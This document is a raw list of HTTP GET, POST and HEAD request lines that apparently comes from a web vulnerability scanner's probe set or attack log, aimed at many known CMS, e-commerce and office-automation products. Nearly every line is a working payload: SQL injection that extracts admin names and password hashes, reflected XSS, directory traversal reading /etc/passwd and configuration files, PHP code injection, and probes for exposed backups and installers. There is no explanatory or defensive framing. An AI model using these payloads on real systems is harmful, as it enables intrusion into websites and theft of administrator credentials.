GET /api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
GET /api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
GET /api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
GET /api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
GET /index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
POST /subscribe.php?act=dounsubscribe
POST /productbuy/checkout.asp?11_22.html
GET /data/%23data.asp
POST /manage/Config/BackupRestore.aspx
GET /install/index.php.bak?insLockfile=1
GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
POST /?cart-addGoodsToCart.html
POST /install/index.php?step=active
GET /index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
GET /install/index.php?step=1&insLockfile=1
GET /plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
GET /plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
GET /plus/ad_js.php?aid=1&nocache=1
POST /admin.php
GET /resume/?key=xxxx%bf%22;alert(360);//
POST /register.php?do=check
GET /about/?module=../robots.txt&fmodule=7
GET /plus/Promotion.asp
GET /besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
GET /index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
GET /admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
POST /index.php?m=announcement&s=admin/notice
GET /item/?c-5,key-1'.html
GET /admin/fileopen.asp?filename=../index.asp
GET /cache/bak_mysql.txt
GET /index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
GET /api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
GET /product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
GET /user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
POST /article_cat.php?id=12
POST /passport-verify.html
GET /user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
GET /ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
GET /statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
POST /inquiry.php?action=inquiry
GET /install/index.php?_m=frontpage&_a=check
POST /api.php?act=get_spec_single&api_version=3.1
GET /index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
POST /api.php?act=get_product_detail_info&api_version=3.1
POST /api.php?act=get_products_list&api_version=3.1
POST /?tools-products.html
POST /index.php?case=admin&act=login&admin_dir=admin&site=default
GET /index.php?case=user&act=space&mid=1
GET /?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
GET /ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
GET /index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
GET /index.php?m=Order&a=index
GET /index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
POST /api/search.php?moduleid=5
POST /item.php?act=ajax&do=subject&op=get_membereffect
GET /include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
GET /include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
GET /do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
GET /?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
POST /?case=manage&act=guestadd&manage=archive&guest=1
GET /article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
GET /phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
GET /u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
GET /index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
GET /misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
GET /general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
GET /jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
POST /member.php?act=login&op=forget&rand=U7183
GET /mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
POST /bocadmin/j/uploadify.php
POST /index.php?app=main&func=common&action=upFile&act=upforhtmleditor
POST /lib/upload/upload.php
GET /jcms/setup/publishadmin.jsp
GET /jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
GET /jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
GET /index.php?app=user&ac=../../../robots.txt%00
GET /index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
GET /index.php?app=/../robots.txt%00
POST /utility/convert/index.php
POST /utility/convert/data/config.inc.php
GET /install/svinfo.php
GET /posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
POST /wap/index.php?mod=login&action=login
GET /wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
POST /cart.php
POST /api.php?act=set_shopex_conf&api_version=5.0
GET /report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
POST /user.php?act=signin
GET /CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
GET /admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
GET /Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
GET /ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
GET /DownloadShow.asp
GET /NewsClass.asp
GET /plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
GET /index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23
GET /Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
GET /temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
POST /api.php?act=search_dly_type&api_version=1.0
GET /api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
GET /?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
GET /aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
POST /lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /index.php?m=message&s=inquiry_basket
GET /index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
GET /index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
GET /index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
GET /index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
GET /index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
GET /notes.php?action=view&nid=1-websec
GET /?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
GET /general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /Search.asp
GET /suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
GET /ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
GET /cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
GET /download.php?tfile=%5C..%5C..%5Cconfig.php
GET /plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
POST /api.php?act=search_sub_regions&api_version=1.0
GET /index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
GET /index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
GET /index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
GET /index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
GET /index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
GET /index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
GET /manage/WAP/Other/AddDalen.aspx?menu=add
GET /login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
GET /install/step4.aspx
HEAD /DataBase/%23zhi_rui_v_Base.mdb
GET /manage/Shop/profile/LmUserManage.aspx
GET /API/GetPageHtml.aspx
GET /stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
GET /manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
GET /msgChat/download.jsp?url=msgChat/download.jsp
GET /admin.php
GET /index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
POST /index/searchInfoTcontentByCategory.action
POST /emlib4/system/datasource/selectrecordset.aspx
POST //index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
GET /home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
GET /web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
GET /ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
GET /index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
GET /index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
GET /customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
GET /module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
POST /module/AIP/upload.php?RUN_ID=1&T_ID=1
GET /general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
POST /index.php?m=company&s=admin/business_info_list
GET /index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
POST /getpwd4.asp
GET /?m=offer&s=offer_list&id=1-webscan%23
POST /MemberLogin.asp
GET /views.asp
GET /basket.asp?h%77_id=513%20and%201=2
GET /protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
POST /index.php?app=tag&ac=add&ts=do
GET /member/index.php?ugid31=51'%20and%20'1122'='12
GET /siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
GET /UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
GET /search.php?mod=information&ids=1-webscan&catid=1
POST /box.php?
GET /siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
GET /siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
GET //siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
GET /siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
GET /downLoadFile.action?filePath=/WEB-INF/web.xml
GET /siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
GET /SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
GET /job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
GET /searchLines.aspx?LName=h%25';
GET /ProductBuy.Asp
GET /newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
GET /searchLines.aspx?LName=h&t=webscan()'
GET /viewlist.aspx?typeid=webscan()'
GET /company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
POST /resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
GET /?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
GET /admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
GET /index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
GET /gallery--p,0,1122%20and%200-0---1.html
GET /?m=info.detail&id=1-webscan
GET /misc.php?mod=getuserinfo&uid=-1
POST /?m=city.getSearch&index=reer
GET /?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
GET /admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /Product.asp
POST /user/getpassword.asp
GET /admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
POST /plus/ajax_user.php?act=check_email
POST /plus/ajax_user.php?act=check_usname
GET /HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
GET /ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
GET /ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
GET /ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
GET /index.php?app=user&ac=plugin&in=../../robots.txt%00
POST /member.php?act=login&op=forget
GET /item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
